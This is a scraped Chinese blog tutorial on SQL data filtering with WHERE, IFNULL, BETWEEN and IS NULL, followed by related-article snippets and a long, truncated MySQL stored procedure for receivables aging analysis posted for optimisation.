sql学习记录5-数据过滤 WHERE/IFNULL(参1,参2)/BETWEEN...AND.../IS NULL/IS NOT NULL

最新推荐文章于 2024-01-27 18:55:31 发布
原创 最新推荐文章于 2024-01-27 18:55:31 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了SQL中的数据过滤,包括WHERE子句的使用、IFNULL函数处理NULL值,以及BETWEEN...AND...和IS NULL/IS NOT NULL的空值过滤。讲解了WHERE子句的位置和作用,以及在比较时如何处理数字和字符串类型的值。IFNULL函数在列值为NULL时提供替代值,避免空值遗漏。同时,详细解释了BETWEEN...AND...和IS NULL/IS NOT NULL操作符在过滤数据时的应用场景。

在这里插入图片描述在这里插入图片描述

1. 数据过滤WHERE

  1. WHERE不能单独使用,指的是必需于增删改查的必需子句连在一起使用,是非必需子句;

  2. 位置: WHERE 子句在FROM之后,ORDER 之前

  3. 文本格式的数值同样需要转换一下在进行比较。

  4. WHERE过滤的是行不影响列的展示。

  5. WHERE 忽略NULL 的处理。

  6. 常规运算符:等于(=);不等于(!=或者<>);大于(>);小于(<);大于等于(>=);小于等于(<=);

  7. 过滤的条件列可以不出现在展示结果中。比如:

SELECT m.* FROM milk_tea AS m WHERE m.sale_price - m.in_price < 5;
  1. 过滤的条件如果是数字型字符串,可以直接使用数字,也可以用引号把数字引住,两种结果是一样的;如果是非数字型字符串,那么必须用英文引号。
SELECT m.* FROM milk_tea AS m WHERE m.prod_id = 2; 
SELECT m.* FROM milk_tea AS m WHERE m.prod_id = '2'
最低0.47元/天 解锁文章
MOSH10小时学会sql笔记大全(数据分析零基础学习笔记—2.1_sql
Adore_rui的博客
02-17 1748
sql语法大全
SQL1158. 市场分析 1-2
泛泛之素
03-30 360
数据 Table: Users +----------------+---------+ | Column Name | Type | +----------------+---------+ | user_id | int | | join_date | date | | favorite_brand | varchar | +----------------+---------+ 此表主键是 user_id,表中描述了购物网站的用户信息,用户可以在此网
SQL—用where过滤数据
LOOCOO225的博客
11-29 1223
一、WHEHE子句操作符 操作符 说明 = 等于 <> 不等于 != 不等于 < 小于 <= 小于等于 > 大于 >= 大于等于 BETWEEN 在指定的两个值之间,值用“AND”连接 IS NULL 包含0,空字符串、或仅仅包含空格不同 二、等于 1. 位于不同列的多个过滤条件 Select * FROM analyse WHERE city = "深圳" AND
mysql if 、ifnullis not nullisnull函数
adsadadaddadasda的博客
11-02 8889
一、IF函数  表达式:IF(expr1,expr2,expr3)  满足条件expr1即条件expr1返回true  则expr2否则就是expr3 返回false  作为排序条件使用时 放在order by 后  eg:  1. SELECT IF(1=1,2,3); 则输出2  2.SELECT IF(1=2,2,3);则输出3  select * from test_table order...
mysql的三种条件判断函数
一步一个脚印_binding
04-27 7251
第一种:if() 语法:if(表达式,值1,值2) 当表达式的值为真时,返回值1,否则返回值2 第二种:ifNull(1,值2) 当值1不为null时,返回值1,否则返回值2 对于上面的例子不适合用这种 第三种:case 表达式 when 条件1 then 值1when 条件2then 值2 ... else 值n end 看语法格式我们会发现此类函数写法上比较麻烦,但其表达的逻辑却最贴近我们日常的思维习惯。 当表达式的值和条件1匹配时,返回值1,...以此类推 没有条件匹配时...
SQL语句中is not nullis null 关键字的优化
susu1083018911的博客
04-04 2056
SQL语句中is not nullis null 关键字的优化
SQL Server-过滤数据
GTC的博客
03-18 980
SQL Server-过滤数据1、使用where子句2where子句操作符2.1、检查单个值2.1、不匹配检查2.1、范围值检查2.1、空值检查3、所有代码 该文章中使用的数据表创建于我的另一篇博客 点击前往 1、使用where子句 在select语句中,数据根据where子句中指定的搜索条件进行过滤where子句在表名(from子句)之后给出。 示例: select *from 学生表 where 性别 = '男' 执行以上代码后,可得结果: 该语句从学生表中检索所有列,但是不返回所有行,只返回
精选资源
mysql学习笔记.pdf
03-14
条件查询则利用各种条件运算符(如>、<、=)、逻辑运算符(如AND、OR、NOT)和模糊匹配(如LIKE、BETWEEN、IN)来筛选特定数据。例如,`SELECT * FROM 表名 WHERE 筛选条件`用于根据条件获取数据。 更高级的功能...
帮我优化这个mysql存储过程 以提高查询速度为主要目标 CREATE DEFINER=`tongfun`@`%` PROCEDURE `销售账龄分析表`(IN fhth VARCHAR(100), IN fdate date, in zd VARCHAR(100)) begin delete from temp_zlfxb ; delete from temp_zlfxb1 ; delete from zlfxb_ht ; #0519调整账龄分析表,增加更多明细信息 #累计数据 insert into zlfxb_ht ( SELECT id from b_salesdeliver_sales_contract b where code like concat('%',fhth,'%') and contract_type <> 9404 and b.is_deleted=0 and FIND_IN_SET(produce_station,zd) and id not in (SELECT contract_id from b_salesdeliver_contract_settle_accounts where status=9333 and is_closeout=1) ) ; insert into temp_zlfxb1(htid,FHTH,fkh,fgcxm,FJZQJXL,FJZQJJE,FJZQJSK,FZJQK,fdate_zhjz,fdate_zhhk,yqwsk) #yqwsk:逾期时间后的回款金额,逾期录入时,已经减去对应收款作为逾期金额 select a.id , a.code, a1.name, a2.name, ifnull(b.销售量, 0) + ifnull(c.累计销售量, 0) + ifnull(d.累计销售量, 0) + ifnull(f.tzfl, 0),# 累计发货方量 ifnull(b.销售额, 0) + ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje,#截止期间金额 ifnull(b.`已收款`, 0) + IFNULL(e.skje, 0),#累计收款金额 (ifnull(b.销售额, 0) + ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0))- (ifnull(b.`已收款`, 0) + IFNULL(e.skje, 0)), # c.zhjzrq, e.zhhkrq, IFNULL(e.skje, 0) from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取期初数据 SELECT contract_code, IFNULL(sales_amount, 0) 销售量,# IFNULL(sales_money, 0) 销售额,# IFNULL(receivables_money, 0) 应收款,# IFNULL(received_money, 0) 已收款,# IFNULL(invoiced_money, 0) 已开票, # IFNULL(invoiced_money, 0) 已结算金额 # FROM b_delivery_config a inner join zlfxb_ht zl on a.contract_id=zl.id where is_deleted = 0) b on a.code = b.contract_code left join ( #获取小票数据 SELECT a.contract_code, max(issue_date) zhjzrq, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid inner join zlfxb_ht zl on a.contract_id=zl.id AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取收款数据 SELECT a.contract_code, max(b.receipt_time) zhhkrq, (sum(ifnull(receipt_price, 0)) - sum(ifnull(refund_price, 0))) skje from b_salesdeliver_contract_receipt_refund_info a INNER JOIN b_salesdeliver_contract_receipt_refund b on a.pid = b.id inner join zlfxb_ht zl on a.contract_id=zl.id where b.status = 9333 and b.is_deleted = 0 and a.is_deleted = 0 AND B.receipt_time BETWEEN '2000-01-01' and fdate group by contract_code) e on a.code = e.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id INNER JOIN b_basic_customer a1 on a.settlement_company_id=a1.id INNER JOIN b_basic_project a2 on a.engineering_project_id=a2.id ; #获取期间数据 insert into temp_zlfxb(htid,famount1,famount2,famount3,famount4,famount5,famount6,famount7 ,famount8,famount9,famount10,famount11 ) select con.id,sum(h.ljxsje),sum(j.ljxsje),sum(k.ljxsje),sum(l.ljxsje),sum(m.ljxsje),sum(n.ljxsje),suM(o.ljxsje) ,suM(p.ljxsje),suM(q.ljxsje),suM(r.ljxsje),suM(s.ljxsje) from b_salesdeliver_sales_contract con inner join zlfxb_ht zl on con.id=zl.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and TIMESTAMPDIFF(DAY,a.issue_date,DATE_FORMAT(fdate, '%Y-%m-%d %H:%i:%S'))<=30 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and TIMESTAMPDIFF(DAY,time,DATE_FORMAT(fdate, '%Y-%m-%d %H:%i:%S'))<=30 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and TIMESTAMPDIFF(DAY,a.pour_time,DATE_FORMAT(fdate, '%Y-%m-%d %H:%i:%S'))<=30 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) h on con.id=h.id left join ( select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 31 and 60 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 31 and 60 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 31 and 60 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) j on con.id=j.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 61 and 90 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 61 and 90 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 61 and 90 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id) k on con.id=k.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 91 and 120 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 91 and 120 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 91 and 120 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id) l on con.id=l.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 121 and 180 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 121 and 180 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 121 and 180 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id) m on con.id=m.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 181 and 365 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 181 and 365 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 181 and 365 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) n on con.id=n.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 366 and 730 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 366 and 730 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 366 and 730 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) o on con.id=o.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 731 and 1095 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 731 and 1095 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 731 and 1095 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) p on con.id=p.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 1096 and 1460 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 1096 and 1460 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 1096 and 1460 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) q on con.id=q.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) between 1461 and 1825 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) between 1461 and 1825 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) between 1461 and 1825 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) r on con.id=r.id left join (select a.id,ifnull(c.累计销售额, 0) + ifnull(d.累计销售额, 0) + ifnull(f.tzje, 0) ljxsje from b_salesdeliver_sales_contract a inner join zlfxb_ht zl on a.id=zl.id left join ( #获取小票数据 SELECT a.contract_code, sum(ifnull(a.sign_for_amount, 0)) 累计销售量, sum(ifnull(a.tip_total_price, 0)) 累计销售额 FROM b_salesdeliver_electronic_tip a inner join zlfxb_ht zl on a.contract_id=zl.id WHERE a.issue_date BETWEEN '2000-01-01' and fdate and datediff(fdate,ifnull(a.issue_date,0)) > 1825 and a.is_accumulate_car_num = 1 AND ifnull(a.settlement_id, 0) = 0 AND ifnull(a.settlement_code, '') = '' and a.is_deleted = 0 group by a.contract_code) c on a.code = c.contract_code left join ( #获取结算数据 SELECT a.contract_code, sum(ifnull(b.amount_subtotal, 0)) 累计销售量, sum(ifnull(b.total_money, 0)) 累计销售额 FROM b_salesdeliver_concrete_settlement_bill a inner join zlfxb_ht zl on a.contract_id=zl.id INNER JOIN b_salesdeliver_concrete_settlement_bill_info b ON a.id = b.pid AND b.is_deleted = 0 AND date(b.time) BETWEEN '2000-01-01' and fdate and datediff(fdate,b.time) > 1825 WHERE a.is_deleted = 0 GROUP BY a.contract_code) d on a.code = d.contract_code left join ( #获取调整数据 select a.contract_id, sum(adjustment_money) tzje, sum(adjust_amount) tzfl from b_salesdeliver_schedule_money_alteration a inner join zlfxb_ht zl on a.contract_id=zl.id where a.is_deleted = 0 and a.pour_time BETWEEN '2000-01-01' and fdate and datediff(fdate,a.pour_time) > 1825 and a.settlement_id is null group by a.contract_id) f on a.id = f.contract_id ) s on con.id=s.id group by con.id; -- #期初账龄 -- update temp_zlfxb a -- INNER JOIN (select a.contract_id, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') <= 30 then ifnull(a.overdue_money,0) else 0 end famount1, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 31 and 60 then ifnull(a.overdue_money,0) else 0 end famount2, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 61 and 90 then ifnull(a.overdue_money,0) else 0 end famount3, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 91 and 120 then ifnull(a.overdue_money,0) else 0 end famount4, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 121 and 180 then ifnull(a.overdue_money,0) else 0 end famount5, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 181 and 365 then ifnull(a.overdue_money,0) else 0 end famount6, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 366 and 730 then ifnull(a.overdue_money,0) else 0 end famount7, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 731 and 1095 then ifnull(a.overdue_money,0) else 0 end famount8, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 1096 and 1460 then ifnull(a.overdue_money,0) else 0 end famount9, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') between 1461 and 1825 then ifnull(a.overdue_money,0) else 0 end famount10, -- case when ifnull(a.overdue_days,0)+datediff(fdate,'2024-09-28') > 1825 then ifnull(a.overdue_money,0) else 0 end famount11 -- from b_delivery_config a where a.is_deleted=0) b on a.htid=b.contract_id -- set a.famount1=ifnull(a.famount1,0)+ifnull(b.famount1,0), -- a.famount2=ifnull(a.famount2,0)+ifnull(b.famount2,0), -- a.famount3=ifnull(a.famount3,0)+ifnull(b.famount3,0), -- a.famount4=ifnull(a.famount4,0)+ifnull(b.famount4,0), -- a.famount5=ifnull(a.famount5,0)+ifnull(b.famount5,0), -- a.famount6=ifnull(a.famount6,0)+ifnull(b.famount6,0), -- a.famount7=ifnull(a.famount7,0)+ifnull(b.famount7,0), -- a.famount8=ifnull(a.famount8,0)+ifnull(b.famount8,0), -- a.famount9=ifnull(a.famount9,0)+ifnull(b.famount9,0), -- a.famount10=ifnull(a.famount10,0)+ifnull(b.famount10,0), -- a.famount11=ifnull(a.famount11,0)+ifnull(b.famount11,0); update temp_zlfxb1 a left join temp_zlfxb b on a.htid=b.htid set a.famount1=b.famount1, a.famount2=b.famount2, a.famount3=b.famount3, a.famount4=b.famount4, a.famount5=b.famount5, a.famount6=b.famount6, a.famount7=b.famount7, a.famount8=b.famount8, a.famount9=b.famount9, a.famount10=b.famount10, a.famount11=b.famount11 where a.htid=b.htid ; # 取回款信息 update 